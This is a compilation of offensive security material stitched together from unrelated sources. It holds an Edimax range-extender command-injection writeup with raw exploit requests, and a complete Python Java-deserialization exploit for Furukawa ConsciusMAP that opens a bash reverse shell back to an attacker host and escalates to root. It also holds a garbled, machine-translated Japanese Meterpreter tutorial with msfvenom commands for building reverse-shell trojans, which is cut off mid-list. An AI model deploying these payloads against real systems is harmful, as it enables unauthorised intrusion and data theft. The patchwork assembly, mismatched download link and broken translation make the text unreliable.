# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
# Date: 2020-04-23
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
------
NOTE: This device is configured with root permissions, so you can run the
command as root
Here are the details of the RCEs
1- Content of the mp.asp file
<form action="/goform/mp" method="POST" name="mp">
<input type="text" name="command" value=""> <input
type="submit" value="GO">
<input type="hidden" name="getID" value="">
<input type="hidden" name="getID" value="">
</form>
RCE Detail:
-------------------------------
POST /goform/mp HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
command=||busybox+ls&getID=
-------------------------------
2- Content of the syscmd.asp
<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
border=0 width="500" cellspacing=0 cellpadding=0>
<tr><font size=2>
This page can be used to run target system command.</tr>
<tr><hr size=1 noshade align=top></tr>
<tr> <td>System Command: </td>
<td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
<td> <input type="submit" value="Apply" name="apply" onClick='return
saveClick()'></td></form>
RCE Detail:
-------------------------------
POST /goform/formSysCmd HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1
sysCmd="command to here"
# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
# Date: 2020-04-24
# Vendor Homepage: https://www.tecnoredsa.com.ar
# Exploit Authors: LiquidWorm
# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
# Version: 2.8.1
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
#
#
# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
# Affected version: APROS Evolution | 2.8.1
# FURUKAWA | 2.7.10
# ConsciusMAP | 2.6.4
# | 2.3.1
# | 2.1.49
# | 2.1.36
# | 2.1.31
# | 2.1.18
# | 2.1.16
# | 2.1.15
# | 2.1.1
# | 2.0.1174
# | 1.8
# | 1.4.70
#
# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
# provisioning system for FTTH networks. Complete administration of
# your entire external FTTH network plant, including from the ONUs
# installed in each end customer, to the wiring and junction boxes.
# Unify all the management of your FTTH network on a single platform.
# Unify all your data, whether from customers, your network, or the
# external plant in one place. APROS FTTH allows you to manage your
# entire FTTH network in a simple and globalized way with just one
# click, without being a network expert. Includes services such as:
# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
# QinQ for companies, and many more. General consumption graphics and
# per customer in real time. Captive Portal for cutting or suspension
# of the service.
#
# Desc: The FTTH provisioning solution suffers from an unauthenticated
# remote code execution vulnerability due to an unsafe deserialization
# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
# HTTP POST parameter. The deserialization can cause the vulnerable JSF
# web application to execute arbitrary Java functions, malicious Java
# bytecode, and system shell commands with root privileges.
#
# ===================================================================
# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
# [*] Setting up valid URL path
# [*] Starting callback listener child thread
# [*] Starting handler on port 4444
# [*] Sending serialized object
# [*] Connection from 172.16.0.1:48446
# [*] You got shell!
# tomcat7@zslab:/var/lib/tomcat7$ id
# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
# tomcat7@zslab:/var/lib/tomcat7$ sudo su
# id
# uid=0(root) gid=0(root) grupos=0(root)
# exit
# tomcat7@zslab:/var/lib/tomcat7$ exit
# *** Connection closed by remote host ***
# ===================================================================
#
# Tested on: Apache Tomcat/7.0.68
# Apache Tomcat/7.0.52
# Apache MyFaces/2.2.1
# Apache MyFaces/2.1.17
# Apache MyFaces/2.0.10
# GNU/Linux 4.4.0-173
# GNU/Linux 4.4.0-137
# GNU/Linux 4.4.0-101
# GNU/Linux 4.4.0-83
# GNU/Linux 3.15.0
# GNU/Linux 3.13.0-32
# PrimeFaces/4.0.RC1
# Apache-Coyote/1.1
# ACC Library 3.1
# Ubuntu 16.04.2
# Ubuntu 14.04.2
# Java/1.8.0_242
# Java/1.8.0_181
# Java/1.8.0_131
# Java/1.7.0_79
# MySQL 5.7.29
# MySQL 5.7.18
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5565
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
#
# CVE ID: CVE-2020-12133
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
#
#
# 24.02.2020
#
import os#############
import sys############
import gzip#######o###
import zlib###########
import socket#########
import base64#########
import urllib#########
import requests#######
import telnetlib######
import threading######
import subprocess#####
from io import BytesIO
from time import sleep
from flash import blic
class Optics:
    """Driver for the ZSL-2020-5565 proof of concept described in the header.

    Flow, as wired in main(): par() reads argv, check() fetches the target's
    root page and picks "/FURUKAWA/" or "/APROS/" as the application path,
    thricer() starts allears() in a thread and then calls gadget(), which
    builds the serialized Java object and POSTs it gzip+base64 encoded as
    the 'javax.faces.ViewState' form parameter.

    Detection notes (all values visible in gadget()): the request uses
    User-Agent "ISP-Eye/2.51" and an Accept header ending in "q=1.pwn", and
    the ViewState body decompresses to a Java serialization stream
    (0xAC 0xED 0x00 0x05) naming java.util.HashSet and several
    org.apache.commons.collections classes.
    """

    def __init__(self):
        # Every attribute starts empty and is filled by par()/check()/gadget().
        self.callback = None  # LHOST embedded in the shell command (par)
        self.headers = None   # HTTP headers built by gadget()
        self.payload = None   # not assigned anywhere else in this class
        self.target = None    # "http://RHOST[:RPORT]" (par)
        self.lport = None     # LPORT as int (par)
        self.path = None      # "/FURUKAWA/" or "/APROS/" (check)
        self.cmd = None       # command string placed in the payload (gadget)

    def allears(self):
        """Bind 0.0.0.0:lport, accept one connection and hand it to telnetlib.

        Runs in the thread started by thricer(). accept() is limited to
        8 seconds; on timeout the script prints a hint, closes the socket
        and calls exit(0). NOTE(review): exit() here raises SystemExit inside
        a non-main thread, which presumably ends only this thread — confirm.
        The listening socket `s` is closed only on the timeout path.
        """
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(8)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                # The Telnet object is only a relay: its socket is replaced
                # by the accepted connection so interact() can drive it.
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
                print("[+] Check your port mappings.")
                s.close()
                exit(0)
            break  # one connection only: the loop body never runs twice
        print("[*] You got shell!")
        #
        # UnicodeDecodeError dirty fix:
        # /usr/lib/python3.6/telnetlib.py
        # Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
        #
        telnetus.interact()
        conn.close()

    def thricer(self):
        """Start the listener thread, wait one second, then send the payload."""
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.allears)
        konac.start()
        sleep(1)  # crude wait so allears() has bound the port before the POST
        self.gadget()

    def gadget(self):
        """Build the serialized object, wrap it (gzip, then base64) and POST it.

        self.cmd becomes "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/CALLBACK/LPORT<&1".
        The byte string below is a Java serialization stream; the class and
        method names it carries are readable in the hex: java.util.HashSet,
        org.apache.commons.collections.keyvalue.TiedMapEntry,
        ...map.LazyMap, ...functors.ChainedTransformer,
        ...functors.ConstantTransformer (java.lang.Runtime),
        ...functors.InvokerTransformer with "getRuntime", "getMethod",
        "invoke" and "exec", then java.lang.Integer and java.util.HashMap.
        The TC_STRING key of the TiedMapEntry is the literal
        "https://github.com/joaomatosf/jexboss ", which suggests the
        payload was taken from that tool (inference).

        The HTTP response `r` is never inspected; success is judged solely
        by whether allears() receives a connection.
        """
        self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
        self.cmd += self.callback
        self.cmd += "/"
        self.cmd += str(self.lport)
        self.cmd += "<&1"
        # Stream magic 0xACED, version 5, then TC_OBJECT/TC_CLASSDESC "java.util.HashSet".
        payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
        payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
        payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
        # "org.apache.commons.collections.keyvalue.TiedMapEntry"
        payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
        payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
        payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
        payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
        payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
        payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
        payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
        # TC_STRING key: "https://github.com/joaomatosf/jexboss "
        payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
        payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
        # "org.apache.commons.collections.map.LazyMap"
        payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
        payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
        payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
        payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
        payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
        payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
        payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
        # "org.apache.commons.collections.functors.ChainedTransformer"
        payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
        payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
        payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
        payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
        payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
        payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
        payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
        payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
        payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
        payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
        payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
        payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
        # Array of 5 transformers; first: "...functors.ConstantTransformer"
        payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
        payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
        payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
        payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
        payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
        # TC_CLASS "java.lang.Runtime"
        payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
        payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
        # "...functors.InvokerTransformer"
        payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
        payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
        payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
        payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
        payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
        payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
        payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
        payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
        payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
        payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
        payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
        payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
        payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
        # Method names "getRuntime" ...
        payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
        payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
        payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
        # ... "getMethod" ...
        payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
        payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
        payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
        payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
        payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
        # ... "invoke" ...
        payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
        payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
        payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
        payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
        payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
        payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
        # String[1] argument: TC_STRING tag + high length byte 0x00 ...
        payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
        # ... low length byte via chr(), then the command text itself.
        payload += (bytes(chr(len(self.cmd)), "utf-8"))
        payload += (bytes(self.cmd, "utf-8"))
        # ... "exec", then java.lang.Integer / java.lang.Number and a trailing java.util.HashMap.
        payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
        payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
        payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
        payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
        payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
        payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
        payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
        payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
        payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
        payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
        payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
        # gzip in memory, then base64: the usual encoding of a JSF server-side ViewState.
        jbits = BytesIO()
        with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
            f.write(payload)
        serialize = base64.b64encode(jbits.getvalue())
        print("[*] Sending serialized object")
        self.headers = {
            "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
            "Content-Type" : "application/x-www-form-urlencoded",
            "User-Agent" : "ISP-Eye/2.51",
            "Connection" : "keep-alive"}
        self.paramz={"javax.faces.ViewState" : serialize}
        #sleep(1)
        r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)

    def par(self):
        """Parse argv: <RHOST[:RPORT]> <LHOST> <LPORT>; any other count shows usage and exits.

        The "http" substring test also accepts targets already given with a
        scheme (http:// or https://); otherwise "http://" is prepended.
        """
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.target = sys.argv[1]
            self.callback = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.target:
                self.target = "http://{}".format(self.target)

    def check(self):
        """GET the target root and derive self.path from the page text.

        Exits when neither "FURUKAWA" nor "APROS" appears in the body, or
        when the request raises. The final `else: exit(-1337)` is
        unreachable because of the guard above it. The GET has no timeout.
        """
        print("[*] Setting up valid URL path")
        try:
            r = requests.get(self.target)
            app = r.text
            if not "FURUKAWA" in app and not "APROS" in app:
                print("[!] App not detected.")
                exit(0)
            if "FURUKAWA" in app:
                self.path = "/FURUKAWA/"
            elif "APROS" in app:
                self.path = "/APROS/"
            else:
                exit(-1337)
        except Exception as p:
            print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
            exit(0)

    def framed(self):
        """Print the advisory banner."""
        naslov = """
o===--------------------------------------===o
| |
| Furukawa Electric / Tecnored |
| APROS Evolution | FURUKAWA | ConsciusMAP |
| Fiber-To-The-Home (FTTH) |
| |
| Java Deserialization Remote Code Execution |
| ZSL-2020-5565 |
| |
o===--------------------------------------===o
||
||
(\__/)||
(•ㅅ•)||
/ づ|
"""
        print(naslov)

    def usage(self):
        """Print banner plus usage text, then exit(0)."""
        self.framed()
        print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
        print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
        exit(0)

    def main(self):
        """Run the three phases in order: argument parsing, path detection, listener + payload."""
        self.par()
        self.check()
        self.thricer()
if __name__ == "__main__":
    # Script entry point: build the driver and run par() -> check() -> thricer().
    optics = Optics()
    optics.main()
0x01pirst学習メータープレーター
1.1.メータープレターとは何ですか
MeterPreterは、MetaSploitフレームワークの拡張モジュールです。オーバーフローが成功した後、攻撃ペイロードとして使用されます。オーバーフロー攻撃が成功した後、攻撃ペイロードはコントロールチャネルを返します。攻撃のペイロードとして使用すると、ターゲットシステムのメータープレターシェルへのリンクを取得できます。 MeterPreter Shellには、ユーザーの追加、何かの隠れ、ユーザーのパスワードの開き、リモートホストのファイルのアップロードとダウンロード、CMD.exeの実行、画面のキャプチャ、リモートコントロールのキャプチャ、キー情報の取得、キー情報の取得、アプリケーションのクリア、リモートホストのシステム情報の表示などのマシンなどのインターフェースの表示などの表示など、浸透モジュールとして多くの有用な機能があります。リモートホストに身を隠すと、システムハードディスク内のファイルが変更されないため、HIDS [ホストベースの侵入検知システム]が応答することは困難です。 In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person.
最後に、MeterPreterは複数のセッションを作成するタスクを簡素化することもできます。これらのセッションは、浸透に使用できます。 Metasploitフレームワークでは、MeterPreterは浸透後のツールであり、動作中に動作中に拡張できる動的でスケーラブルなペイロードです。このツールは、「メモリDLLインジェクション」の概念に基づいて実装されています。これにより、ターゲットシステムは、新しいプロセスを作成し、注入されたDLLを呼び出すことにより、注入されたDLLファイルを実行できます。その中で、ターゲットデバイス内の攻撃者とメータープレターとの間の通信は、ステージャーソケットを介して実装されています。浸透後モジュールとしてはメータープレターには多くの種類があり、コマンドはコアコマンドと拡張ライブラリコマンドで構成されており、攻撃方法を大幅に濃縮しています。
MeterPreterを説明する必要がある場合、脆弱性が正常に活用された後、コードの第2フェーズとMeterPreterサーバーDLLが送信されます。したがって、ネットワークの不安定な場合、多くの場合、実行可能なコマンドがないか、セッションの確立とヘルプの実行が欠落していることがわかります。これは、VPNに接続し、イントラネットでPSEXECとBIND_TCPを使用するときにしばしば発生します。
1.2.meterpreterテクノロジーの利点
MetaSploitは、WindowsやLinuxなどのさまざまな主流プラットフォームのメータープレターバージョンを提供し、X86およびX64プラットフォームをサポートしています。さらに、MeterPreterはPHP言語とJava言語に基づいた実装も提供しています。 MeterPreterの作業モードは純粋なメモリであり、利点は起動して隠されていることです。これは、ウイルス対策ソフトウェアで監視することが困難です。ターゲットホストディスクにアクセスする必要はないため、侵入の兆候はありません。上記に加えて、MeterPreterはRuby Scripting Extensionsもサポートしています。したがって、ルビー言語はまだ必要です。
0x02メータープレーターの一般的なリバウンドタイプ
1.Reverse_TCP
これはTCPベースのバックリンクリバウンドシェルであり、使用するのが非常に安定しています
(1)Linux:
次のコマンドを使用して、Linuxの下でリバウンドシェルトロイの木馬を生成します。
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell
上の写真を見ると、TrojanファイルのISShellがディレクトリで正常に生成されていることがわかります。次に、ファイルに実行可能な権限を追加します。次に、MetaSploitを開き、モジュールハンドラーを使用して、ペイロードを設定します。注:ここのペイロードセットは、トロイの木馬を生成するために使用するペイロードと同じでなければなりません。
アドレスとポートを設定すると、リスニングを開始します
ここでリバウンドシェルトロイの木馬を実行すると、シェルにリバウンドされたことがわかります。
(2)Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oファイル名を生成する
MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE
リバース接続シェルは使用するのが非常に安定しているため、LHOSTを設定する必要があります
2.Reverse_http
HTTPメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。
payload:/windows/meterpreter/reverse_http
3.Reverse_Https
HTTPSメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 HTTPSがリバウンドする場合は、リスニングポートを443に変更してみてください。
payload:/windows/meterpreter/reverse_https
4.bind_tcp
これは、TCPに基づくフォワード接続シェルです。イントラネットがネットワークセグメントを横断しているときに攻撃機に接続できないため、イントラネットでよく使用され、LHOSTの設定を必要としません。
次のコマンドを使用して、トロイの木馬を生成します。
msfvenom -p linux/x86/meterpreter/bind_tcp
lport=4444 -f elf -o shell
同じことは、権限で実行され、デモンストレーションはありません。
ここで、設定したIPアドレスとポートはターゲットマシンからのものであることに注意してください。これが私たちがそれをつなぐためにイニシアチブをとるものだからです。
0x03関連ペイロード
ペイロードには、リモートシステムで実行する必要がある悪意のあるコードが含まれています。 Metasploitでは、ペイロードはモジュールを悪用するために実行できる特別なモジュールであり、ターゲットシステムのセキュリティの脆弱性を活用して攻撃を実装できます。要するに、このエクスプロイトモジュールはターゲットシステムにアクセスでき、そのコードはターゲットシステムでのペイロードの動作を定義します。
Metasploitには、ペイロードモジュールには3つの主要なタイプがあります。
-シングル
- スターガー
-ステージ
シングルは完全に独立したペイロードであり、システムユーザーの追加やファイルの削除など、calc.exeを実行するのと同じくらい簡単です。シングルのため
ペイロードは完全に独立しているため、NetCatのような非メタプロイト処理ツールに捕まることがあります。
Stager Payloadsは、ターゲットユーザーと攻撃者間のネットワーク接続を確立し、追加のコンポーネントまたはアプリケーションをダウンロードする責任があります。一般的なステージャーのペイロードはReverse_TCPです。これにより、ターゲットシステムは攻撃者とのTCP接続を確立できます。別の一般的なタイプはbind_tcpです。これにより、ターゲットシステムはTCPリスナーを有効にし、攻撃者はいつでもターゲットシステムと通信できます。
ステージはステージャーです
ペイロードによってダウンロードされたペイロードコンポーネントこのペイロードは、サイズ制限なしでより高度な機能を提供できます。
Metasploitでは、ペイロードの名前と使用される形式でそのタイプを推測できます。
単一ペイロードの形式はターゲット/シングルです
ステイガー/ステージペイロード形式は、ターゲット/ステージ/ステイガーです
Metasploitで「Payloadsを表示」コマンドを実行すると、利用可能なペイロードのリストが表示されます。
このリストでは、Windows/PowerShell_Bind_TCPは単一のペイロードであり、ステージのペイロードは含まれていません。 Windows/x64/meterpreter/reverse_tcpはステイガーです
ペイロード(Reverse_TCP)とステージペイロード(MeterPreter)。
0x04メータープレーターの共通コマンド
1。基本コマンド
ヘルプ#MeterPreterヘルプを確認してください
バックグラウンド#返品、ハングメータープレターの背景
BGKILL#バックグラウンドメータープレータースクリプトを殺します
BGLIST#は、実行中のすべてのバックグラウンドスクリプトのリストを提供します
bgrun#バックグラウンドスレッドとしてスクリプトを実行します
チャンネル#アクティブチャネルを表示します
セッション-i番号#セッションと対話します。番号はn番目のセッションを意味します。セッション-iを使用して、指定されたシーケンス番号にメータープレターセッションに接続し続けています。
セッション-K番号
#interact with Conversation
#クローズチャンネルを閉じます
終了#メータープレターセッションを終了します
QUIT#メータープレターセッションを終了します
ID #switchをチャンネルに操作します
#既存のモジュールを実行します。ここで言いたいのは、走行してタブを2回クリックした後、既存のすべてのスクリプトが一覧表示されるということです。一般的に使用されるものには、Autoroute、Hashdump、arp_scanner、multi_meter_injectなどが含まれます。
IRB#Rubyスクリプトモードを入力します
#チャネルのデータを読む
#write data to a channel
MeterPreterスクリプトを選択した後、実行およびbgrun#前景と背景実行
MeterPreterの拡張機能をロードする#を使用します
#ロードモジュールをロード/使用します
リソース#既存のRCスクリプトを実行します
2。ファイルシステムコマンド
CAT C: \ boot.ini#ファイルの内容を表示すると、ファイルが存在する必要があります
del C: \ boot.ini #delete指定されたファイル
upload /root/desktop/netcat.exe c: \#setup.exeのアップロードなど、ファイルをターゲット所有者にアップロードします
c: \\ windows \\ system32 \
nimeia.txt/root/desktop/#ダウンロード:c: \\ boot.ini/root/またはダウンロードなど、ファイルをマシンにダウンロードしてください
c: \\ 'programfiles' \\ tencent \\ qq \\ users \\ 295 ****** 125 \\ msg2.0.db
